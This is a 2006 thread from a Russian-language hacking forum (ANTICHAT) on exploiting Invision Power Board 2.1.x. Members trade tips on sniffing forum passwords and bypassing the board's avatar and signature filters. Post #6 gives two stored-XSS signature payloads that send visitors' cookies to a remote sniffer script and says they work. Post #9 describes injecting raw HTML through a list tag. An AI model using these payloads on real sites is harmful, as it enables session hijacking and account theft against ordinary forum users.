HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.06.2006, 19:26
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

Думаю да.
Можно ещё отсниффать пароли к внутренним форумам и полазать по ним.
Зависит от настроек форума.
 
Ответить с цитированием

  #2  
Старый 07.06.2006, 19:30
kulhacker
Новичок
Регистрация: 03.05.2006
Сообщений: 3
Провел на форуме:
8208

Репутация: 0
По умолчанию

Ну а как тогда быть, если нет возможности загрузить аватар с другого адреса?
Если ацкий админ выключил в админке эту возможность?
 
Ответить с цитированием

  #3  
Старый 07.06.2006, 19:53
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Ладно пацан я хочу тебе сказать что существует сайт который как-раз подходит к решению и к решению любой проблемы связаной с Уязвимостью . Этот сайт называется securityfocus.
Зайди сюда:http://www.securityfocus.com/vulnerabilities
найди invision power services потом в нижнем окне напиши invision power board и вследущем окне выбири версию форума.

Надеюсь я тебе помог.
dracula4ever
 
Ответить с цитированием

  #4  
Старый 14.06.2006, 23:01
Kiroff
Новичок
Регистрация: 17.05.2006
Сообщений: 4
Провел на форуме:
7994

Репутация: 0
По умолчанию

а если на форуме выключена поддержка загрузки аватар из нета? только с локальной ашины=(
Пробовал в подпись тоже не жрет
 
Ответить с цитированием

  #5  
Старый 15.06.2006, 11:19
kulhacker
Новичок
Регистрация: 03.05.2006
Сообщений: 3
Провел на форуме:
8208

Репутация: 0
По умолчанию

Да просто заплатку сделали уже)))
 
Ответить с цитированием

  #6  
Старый 19.06.2006, 12:53
Xxor
Познающий
Регистрация: 24.01.2006
Сообщений: 33
Провел на форуме:
413899

Репутация: 10
Отправить сообщение для Xxor с помощью ICQ
Talking

Народ пробуйте вставить в подпись:

<span style='color:#EEF2F7'><span style='color:<img src='http://aaa.aa/=`aaa.jpg' border='0' alt='user posted image' />'>` style=background:url(javascript:document.images[1].src="http://10.12.1.24/snifer/s.gif?"+document.cookie) </span></span>

или вот:
[CO*LOR=[IM*G]http://aaa.aa/=`aaa.jpg[/IM*G]]` style=background:url(javascript:document.images[1].src="http://10.12.1.24/snifer/s.gif?"+document.cookie [/COL*OR] без *


у меня работает =)

Последний раз редактировалось SAflex; 26.06.2006 в 15:43..
 
Ответить с цитированием

  #7  
Старый 19.06.2006, 22:11
DEQ
Новичок
Регистрация: 15.02.2005
Сообщений: 12
Провел на форуме:
68084

Репутация: 2
По умолчанию

Цитата:
Сообщение от SAflex  
у меня работает =)
дай код поточнее т.к. то что ты дал не работает лично у меня на 2.1.6
 
Ответить с цитированием

  #8  
Старый 19.06.2006, 23:22
bl4ck-cat
Познающий
Регистрация: 17.06.2006
Сообщений: 76
Провел на форуме:
263627

Репутация: 32
По умолчанию

хм.. тоже непонял.... зачем например в коде есть `?

Последний раз редактировалось bl4ck-cat; 19.06.2006 в 23:35..
 
Ответить с цитированием

  #9  
Старый 20.06.2006, 08:15
kostet
Новичок
Регистрация: 18.01.2006
Сообщений: 11
Провел на форуме:
54812

Репутация: 3
По умолчанию

Ребят попробуйте в подписи вставить список.

[_list = 1]

<table border="1"><tr><td width="100" height="50"></td></tr></table>
<короче тут можно написать свою станичку>

[_/list]
(без земли)

но </script> и javascript: он сечет

гы. до эксперементировал! у меня терь кнопка "Обноить подпись" не срабатывает

Последний раз редактировалось kostet; 20.06.2006 в 22:26..
 
Ответить с цитированием

  #10  
Старый 26.06.2006, 15:19
Xxor
Познающий
Регистрация: 24.01.2006
Сообщений: 33
Провел на форуме:
413899

Репутация: 10
Отправить сообщение для Xxor с помощью ICQ
По умолчанию

Цитата:
Сообщение от bl4ck-cat  
хм.. тоже непонял.... зачем например в коде есть `?
это его так сам форум поуродовал
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости Ipb 2.1.6 - есть вопрос spheere Сценарии/CMF/СMS 0 27.05.2006 21:16
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Множественные уязвимости в INVISION POWER BOARD 2.1.x dinar_007 Мировые новости. Обсуждения. 12 25.02.2006 18:32
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44
Вопрос про уязвимости в Invision power board =>v2.0.0 Сценарии/CMF/СMS 5 27.10.2004 19:59



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ